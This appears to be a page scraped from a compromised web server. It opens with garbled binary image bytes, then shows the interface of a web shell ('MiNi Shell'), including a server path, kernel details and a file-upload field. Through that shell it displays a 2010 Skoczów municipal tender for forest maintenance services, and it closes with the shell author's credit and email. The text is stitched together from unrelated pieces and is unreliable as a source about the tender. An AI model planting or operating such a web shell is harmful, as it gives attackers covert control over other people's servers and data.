JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/44007-N-2010.html

<p class="kh_header"><b>Skoczów: Utrzymanie lasów miejskich oraz szkółek leśnych na terenie Gminy Skoczów</b><br>
<b>Numer ogłoszenia: 44007 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Skoczowa , ul. Rynek 1, 43-430 Skoczów, woj. śląskie, tel. 033 8532974, faks 033 8532974.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.skoczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie lasów miejskich oraz szkółek leśnych na terenie Gminy Skoczów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowe wykonanie, każdorazowo na podstawie odrębnych zleceń, usługi utrzymania lasów miejskich oraz szkółek leśnych na terenie Gminy Skoczów.
Zakres zamówienia obejmuje:
1) HODOWLĘ    LASU  - a w tym :
a) Szkółkarstwo leśne  ( hodowla sadzonek): 
- przygotowanie kwater pod szkółkowanie oraz wysiew nasion, orka, bronowanie i grabienie,
- stratyfikacja i wysiew nasion przekazanych przez Zamawiającego,
- szkółkowanie rocznych siewek,	
- dowóz wody , podlewanie inspektów oraz nowo zaszkółkowanych sadzonek,  
- oprysk sadzonek środkami grzybobójczymi udostępnionymi przez zamawiającego, 
- ręczne pielenie chwastów oraz spulchnianie gleby wokół sadzonek na międzyrzędach.
b) Zalesianie: 
- dowóz sadzonek ze szkółki  do miejsca sadzenia  wraz z dołowaniem,
- zdarcie pokrywy darniowej i wykopanie  dołka wraz z posadzeniem drzewka. 
c) Poprawki i uzupełnienia:
- dowóz sadzonek ze szkółki na uprawy  założone w latach poprzednich, 
- zdarcie pokrywy darniowej i wykopanie dołka, 
- sadzenie drzewka w miejscach gdzie sadzonki wyschły - zostały połamane przez pokrywę śnieżną lub zniszczone przez zwierzynę  leśną.
d) Pielęgnacja lasu: 
- ręczne wykaszanie - wydeptywanie głuszących traw i chwastów wokół sadzonek na uprawach leśnych, 
- wykonanie w młodnikach czyszczeń wczesnych i późnych,
- formowanie strzał i  koron, podkrzesywanie rozpieraczy, 
- wykonanie trzebieży  wczesnej. 
2)  OCHRONĘ      LASU -  a w tym: 
- zwalczanie kornika  -  ręczne korowanie drewna   zasiedlonego wraz ze spalaniem kory i opryskiem  chemicznym środkami udostępnionymi przez Zamawiającego,
- ręczne smarowanie sadzonek preparatem udostępnionym przez Zamawiającego w celu zabezpieczenia ich przed zgryzaniem,
- palikowanie - polegające na zabezpieczeniu  drzewek przed osmykiwaniem przez samce zwierzyny płowej. 
3)  MELIORACJE: 
- melioracje agrotechniczne - krzewinkowe polegają na wycięciu krzewów, krzewinek,  ułożeniu w stosy i spaleniu ich celem dostosowania przygotowanej powierzchni do zalesienia. Spalanie krzewów będzie się odbywać: każdorazowo za zgodą  Zamawiającego, w sposób zgodny z przepisami p. pożarowymi, z powiadomieniem Straży Pożarnej. 
- melioracje wodne - polegają na czyszczeniu i profilowaniu rowów melioracyjnych. 
4)  POZYSKANIE     DREWNA: 
- ścinka i całkowity wyrób  surowca wielkowymiarowego oraz małowymiarowego pilarką spalinową wraz ze spaleniem gałęzi  z  cięć sanitarnych  i pielęgnacyjnych. 
Spalanie gałęzi będzie się odbywać: każdorazowo za zgodą  Zamawiającego, w sposób zgodny z przepisami p. pożarowymi, z powiadomieniem Straży Pożarnej.
- zrywka drewna ciągnikiem od pnia do dróg wywozowych wraz z mygłowaniem. 
5)  DROGI  LEŚNE: 
- czyszczenie i udrażnianie przepustów pod drogami wywozowymi, 
- wykonanie nowych przepustów, 
- czyszczenie i profilowanie rowów przydrożnych. 
6)  INNE: 
- koszenie ścieżek spacerowych, 
- zbieranie i wywóz śmieci, 
- koszenie traw i chwastów na terenie Harcówki. 

Teren objęty przedmiotem zamówienia znajduje się na terenie miasta Skoczowa - obręb Górny Bór, Dolny Bór, Harcówka.

Rodzaj prac oraz ich przewidywana wielkość w trakcie trwania umowy: (Lp.-Nazwa robót- Jednostka miary- Przewidywana ilość w ciągu trwania umowy): 
1. Ręczne wyjęcie sadzonek 3-4 letnich do zalesień i poprawek- tszt.- 18;
2. Sortowanie , liczenie i dołowanie sadzonek  wraz z przykryciem-tszt.-18;
3. Pełna orka i bronowanie kwater- ar-20;
4. Grabienie i podział na kwatery-ar-15;
5. Ręczne szkółkowanie sadzonek - 1 latek- tszt.- 20;
6. Ręczny wysiew nasion na kwaterach- ar-5;
7. Ręczne pielenie chwastów  na międzyrzędach- ar-150;
8. Ręczne wzruszenie  gleby  na międzyrzędach- ar-75;
9. Oprysk  herbicydami  chwastów na międzyrzędach- godz-60;
10. Koszenie traw i chwastów na powierzchni  nieprodukcyjnej- ar-10;
11. Wymiana substratu ze starego na nowy  wraz z odkażaniem- m2-20;
12. Siew nasion do inspektu- m2-25;
13. Dowóz wody na szkółki-m3-12;   
14. Podlewanie inspektów oraz nowo zaszkółkowanych sadzonek-godz-40;
15. Oprysk sadzonek środkami grzybobójczymi-godz-25;
16. Jesienny zbór nasion drzew liściastych-kg-150;
17. Zabezpieczenie nasion przed zimą- dołowanie- kg-100;
18. Zalesianie - zdarcie pokrywy darniowej i wykopanie dołka wraz z posadzeniem drzewka- tszt.- 10;
19. Poprawki i uzupełnienia - zdarcie pokrywy darniowej i wykopanie dołka wraz z posadzeniem drzewka w miejscu gdzie sadzonki wyschły, zostały połamane przez pokrywę śnieżną lub zniszczone przez zwierzynę leśną-tszt.- 8;
20. Dowóz sadzonek ze szkółki na uprawy leśne-godz-15;
21. Dołowanie sadzonek na powierzchni zalesieniowej-tszt-18;
22. Donoszenie sadzonek do miejsca sadzenia-tszt-16;
23. Ręczne wykaszanie kosą leśną głuszących traw i chwastów wokół sadzonek-ha-8;
24. Wykonanie czyszczeń wczesnych-ha-3;   
25. Wykonanie czyszczeń późnych-ha-4;    
26. Wykonanie trzebieży wczesnej- ha-2;  
27. Formowanie strzał i koron-tszt-0.6;   
28. Zwalczanie kornika - ręczne korowanie drewna zasiedlonego wraz ze spaleniem kory i opryskiem chemicznym-m3-50;
29. Ręczne smarowanie sadzonek środkami chemicznymi w celu zabezpieczenia przed zgryzaniem przez zwierzynę leśną-ha-8;
30. Palikowanie sadzonek celem ochrony przed osmykiwaniem kory przez kozły-tszt.- 1.8;
31. Rozwieszanie budek lęgowych wraz z wykonaniem- szt-20;   
32. Melioracje krzewinkowe- wycięcie krzewów, ułożenie w stosy i spalenie ich w celu przygotowania powierzchni do zalesień-ha-1.0;
33. Melioracje wodne - czyszczenie i profilowanie rowów melioracyjnych-mb-800;
34. Ścinka i całkowity wyrób surowca wielkowymiarowego oraz małowymiarowego piłą spalinową z cięć sanitarnych i pielęgnacyjnych-m3-300;
35. Układanie w stosy i spalanie gałęzi od pozyskanego drewna-m3-150;
36. Zrywka drewna od pnia do dróg wywozowych wraz z mygłowaniem- m3-280;
37. Koszenie traw i chwastów na drogach i ścieżkach spacerowych-mb-600;
38. Koszenie traw i chwastów na terenie Harcówki- ha-2;
39. Zbieranie śmieci na drogach i terenach leśnych-godz-25.
Zamawiający nie zamierza zawierać umowy ramowej. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 77.23.16.00-4, 77.21.00.00-5, 77.23.12.00-0, 77.23.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie niezbędnej wiedzy i doświadczenia, tj. udokumentowanie wykonania lub wykonywania w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
co najmniej jednej usługi o wartości minimum 30.000 zł brutto obejmującej zagospodarowanie i hodowlę lasu.
Na potwierdzenie spełniania niniejszego warunku Wykonawca zobowiązany jest złożyć:
a) wykaz co najmniej jednej wykonanej lub wykonywanej usługi - sporządzony przez Wykonawcę według załącznika nr 2 do specyfikacji.
Wykaz musi zawierać następujące dane:
- nazwę i adres zadania,
- opis i zakres wykonanych prac,
- termin rozpoczęcia i zakończenia zadania,
- nazwa, adres i telefon zamawiającego,
- wartość zrealizowanych prac brutto.
b) dokument potwierdzający, że usługa ta została wykonana lub jest wykonywana należycie.
Ocena spełnienia powyższego warunku zostanie dokonana, zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym, tj. dysponowanie następującym sprzętem:
a) ciągnik z osprzętem rolniczym -1 szt,      
b) piła spalinowa -2 szt, 
c) opryskiwacz plecakowy -1 szt,
d) glebogryzarka -1 szt,
e) kosa spalinowa - 1szt,                                                                                                         f) szpadel - 4 szt,
g) kosa leśna - 2 szt.
Na potwierdzenie spełniania niniejszego warunku Wykonawca zobowiązany jest złożyć:
a) wykaz sprzętu wymaganego do realizacji zamówienia, sporządzony przez wykonawcę według załącznika nr 5 do specyfikacji.
Wykaz musi zawierać następujące dane:
- rodzaj sprzętu,
- ilość sztuk,
- informacja o podstawie dysponowania tym sprzętem.
Ocena spełnienia powyższego warunku zostanie dokonana, zgodnie z formułą spełnia - nie spełnia, na podstawie złożonego przez Wykonawcę wykazu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy (wg załącznika nr 1 do siwz),
2) zaświadczenie o wpisie do ewidencji działalności gospodarczej celem identyfikacji osób upoważnionych do składania oświadczeń woli w imieniu Wykonawcy, W przypadku osób fizycznych ubiegających się o udzielenie zamówienia,
3) pełnomocnictwo (jeśli dotyczy),
4) pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (jeśli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień umowy w następującym zakresie: 
a) przekształcenia podmiotowego Wykonawcy,
b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.skoczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Budynek Wydziału Inwestycji i Rozwoju, Skoczów, ul. Mickiewicza 17, pokój nr 5 (po wcześniejszym uzgodnieniu terminu).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 10:00, miejsce: Urząd Miejski w Skoczowie, Rynek 1, 43-430 Skoczów, pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com